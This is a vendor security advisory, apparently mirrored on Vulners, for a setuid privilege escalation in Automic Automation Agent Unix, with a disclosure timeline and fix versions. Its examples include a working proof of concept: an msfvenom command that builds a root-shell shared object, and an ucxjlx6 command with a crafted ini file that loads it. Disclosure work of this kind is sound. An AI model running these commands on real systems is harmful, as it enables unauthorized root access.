Vulners
Lucene search
📄 Automic Automation Agent Unix Privilege Escalation
secuvera-SA-2025-01: Privilege Escalation
Affected Products
Automic Automation Agent Unix <24.3.0 HF4, <21.0.13 HF1
References
secuvera-SA-2025-01
CVE not assigned yet
CWE-426: Untrusted Search Path
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
Summary:
An agent configured to run in privileged mode using the SetUID-Bit can be used to escalate privileges, by supplying an ini file with the "authentication" option set to "PAM" and the "libName" option set to a shared object file controlled by the attacker.
The shared object will be loaded in an elevated context and can be used to execute arbitrary code as root.
Effect:
The vulnerability results in privilege escalation, caused by arbitrary code execution in the context of the vulnerable application.
Examples:
1. Generate shared object file using msfvenom
$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so
2. Run the ucxjlx6 executable as follows
$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")
Solution:
Update to version 24.3.0 HF4, 21.0.13 HF1 or higher
Disclosure Timeline:
2025/01/20 vulnerability discovered
2025/01/21 vendor contacted
2025/01/21 vendor acknowledged receipt
2025/02/04 requested status update
2025/02/04 provided clarification about the issue
2025/02/11 requested status update
2025/02/26 vendor confirmed vulnerability
2025/03/06 requested status update
2025/03/17 vendor provided fix and requested review
2025/04/03 vendor retracted request for review
2025/04/10 proposed date for public disclosure, vendor requested delay
2025/04/16 coordinated on cvss score and recommended fix
2025/04/28 requested status update
2025/05/02 vendor supplied tentative date for public disclosure
2025/05/08 requested status update
2025/05/12 public disclosure
Credits:
Flora Schaefer
[email protected]
secuvera GmbH
https://www.secuvera.de
Disclaimer:
All information is provided without warranty. The intent is to
provide information to secure infrastructure and/or systems, not
to be able to attack or damage. Therefore secuvera shall
not be liable for any direct or indirect damages that might be
caused by using this information.
Mit freundlichen Grüßen
Flo Schäfer
Meine Pronomen sind sie*er/ihr*ihm. Ich freue mich über eine genderneutrale Anrede.
+49 7032/9758-29
--
#Neues von secuvera.de
- Vortrag auf der CSK-Summit 2025: https://www.secuvera.de/aktuelles/vortrag-auf-der-csk-summit-2025/
- 1.Platz bei GPTW: Bester Arbeitgeber in BW 2025: https://www.secuvera.de/aktuelles/1-platz-bei-gptw-bester-arbeitgeber-in-bw-2025/
- Jahresmeeting 2025 #insideVera: https://www.secuvera.de/aktuelles/jahresmeeting-2025-insidevera/
#Bleiben Sie informiert auf LinkedIn
https://www.linkedin.com/company/secuvera-gmbh
#Rechtliche Informationen
secuvera GmbH
Siedlerstraße 22-24
71126 Gäufelden/Stuttgart
www.secuvera.de
Registergericht: Amtsgericht Stuttgart HRB 241704
Geschäftsführer: Tobias Glemser, Reto LorenzData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 May 2025 00:00Current
8.3High risk
Vulners AI Score8.3